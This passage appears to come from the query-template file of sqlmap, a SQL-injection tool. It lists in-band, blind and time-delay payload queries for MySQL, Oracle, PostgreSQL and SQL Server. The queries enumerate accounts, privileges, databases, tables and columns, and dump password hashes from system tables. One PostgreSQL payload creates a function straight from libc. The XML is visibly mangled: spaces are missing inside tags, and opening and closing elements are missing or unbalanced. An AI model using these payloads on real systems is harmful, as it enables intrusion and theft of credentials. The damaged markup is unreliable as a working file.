<inbandquery="SELECT grantee FROM information_schema.USER_PRIVILEGES"query2="SELECT user FROM mysql.user"/>
<blindquery="SELECT DISTINCT(grantee) FROM information_schema.USER_PRIVILEGES LIMIT %d, 1"query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d, 1"count="SELECT COUNT(DISTINCT(grantee)) FROM information_schema.USER_PRIVILEGES"count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user"/>
</users>
<passwords>
<inbandquery="SELECT user, password FROM mysql.user"condition="user"/>
<blindquery="SELECT DISTINCT(password) FROM mysql.user WHERE user='%s' LIMIT %d, 1"count="SELECT COUNT(DISTINCT(password)) FROM mysql.user WHERE user='%s'"/>
<inbandquery="SELECT schema_name FROM information_schema.SCHEMATA"query2="SELECT db FROM mysql.db"/>
<blindquery="SELECT DISTINCT(schema_name) FROM information_schema.SCHEMATA LIMIT %d, 1"query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d, 1"count="SELECT COUNT(DISTINCT(schema_name)) FROM information_schema.SCHEMATA"count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
</dbs>
<tables>
<inbandquery="SELECT table_schema, table_name FROM information_schema.TABLES"condition="table_schema"/>
<blindquery="SELECT table_name FROM information_schema.TABLES WHERE table_schema='%s' LIMIT %d, 1"count="SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema='%s'"/>
<inbandquery="SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"condition="column_name"/>
<blindquery="SELECT column_name FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"query2="SELECT column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'"count="SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"condition="column_name"/>
<inbandquery="SELECT table_schema FROM information_schema.COLUMNS WHERE "query2="SELECT table_name FROM information_schema.COLUMNS WHERE table_schema='%s'"condition="column_name"condition2="table_schema"/>
<blindquery="SELECT DISTINCT(table_schema) FROM information_schema.COLUMNS WHERE "query2="SELECT DISTINCT(table_name) FROM information_schema.COLUMNS WHERE table_schema='%s'"count="SELECT COUNT(DISTINCT(table_schema)) FROM information_schema.COLUMNS WHERE "count2="SELECT COUNT(DISTINCT(table_name)) FROM information_schema.COLUMNS WHERE table_schema='%s'"condition="column_name"condition2="table_schema"/>
<blindquery="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
<blindquery="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
<blindquery="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d"count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'"/>
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
<dbs/>
<tables>
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
<inbandquery="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES"condition="TABLESPACE_NAME"/>
<blindquery="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d"count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
<inbandquery="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"condition="COLUMN_NAME"/>
<blindquery="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'"count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'"condition="COLUMN_NAME"/>
<inbandquery=""query2="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS"condition="COLUMN_NAME"condition2="TABLESPACE_NAME"/>
<blindquery=""query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS"count=""count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS"condition="COLUMN_NAME"condition2="TABLESPACE_NAME"/>
<timedelayquery="SELECT PG_SLEEP(%d)"query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 3000000))"query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<blindquery="SELECT DISTINCT(usename) FROM pg_user OFFSET %d LIMIT 1"count="SELECT COUNT(DISTINCT(usename)) FROM pg_user"/>
</users>
<passwords>
<inbandquery="SELECT usename, passwd FROM pg_shadow"condition="usename"/>
<blindquery="SELECT DISTINCT(passwd) FROM pg_shadow WHERE usename='%s' OFFSET %d LIMIT 1"count="SELECT COUNT(DISTINCT(passwd)) FROM pg_shadow WHERE usename='%s'"/>
</passwords>
<privileges>
<inbandquery="SELECT usename, (CASE WHEN usecreatedb THEN 1 ELSE 0 END), (CASE WHEN usesuper THEN 1 ELSE 0 END), (CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user"condition="usename"/>
<blindquery="SELECT (CASE WHEN usecreatedb THEN 1 ELSE 0 END), (CASE WHEN usesuper THEN 1 ELSE 0 END), (CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user WHERE usename='%s' OFFSET %d LIMIT 1"count="SELECT COUNT(DISTINCT(usename)) FROM pg_user WHERE usename='%s'"/>
<inbandquery="SELECT schemaname, tablename FROM pg_tables"condition="schemaname"/>
<blindquery="SELECT tablename FROM pg_tables WHERE schemaname='%s' OFFSET %d LIMIT 1"count="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'"/>
<inbandquery="SELECT attname, typname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"condition="attname"/>
<blindquery="SELECT attname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"query2="SELECT typname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s'"count="SELECT COUNT(attname) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'"condition="attname"/>
<inbandquery="SELECT nspname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND "query2="SELECT relname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'"condition="attname"condition2="nspname"/>
<blindquery="SELECT DISTINCT(nspname) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND "query2="SELECT DISTINCT(relname) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'"count="SELECT COUNT(DISTINCT(nspname)) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND "count2="SELECT COUNT(DISTINCT(relname)) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'"condition="attname"condition2="nspname"/>
<blindquery="SELECT TOP 1 name FROM master..syslogins WHERE name NOT IN (SELECT TOP %d name FROM master..syslogins)"query2="SELECT TOP 1 name FROM sys.sql_logins WHERE name NOT IN (SELECT TOP %d name FROM sys.sql_logins)"count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"count2="SELECT LTRIM(STR(COUNT(name))) FROM sys.sql_logins"/>
<inbandquery="SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins"query2="SELECT name, master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins"condition="name"/>
<blindquery="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..sysxlogins WHERE name='%s')"query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM sys.sql_logins WHERE name='%s')"count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'"count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
<blindquery="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name"count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
<blindquery="SELECT TOP 1 name FROM %s..sysobjects WHERE xtype IN ('u', 'v') AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE xtype IN ('u', 'v') ORDER BY name ASC) ORDER BY name ASC"count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u', 'v')"/>
<inbandquery="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'"/>
<blindquery="SELECT TOP 1 name FROM (SELECT TOP %s name FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s') ORDER BY name ASC) CTABLE ORDER BY name DESC"query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'"count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')"/>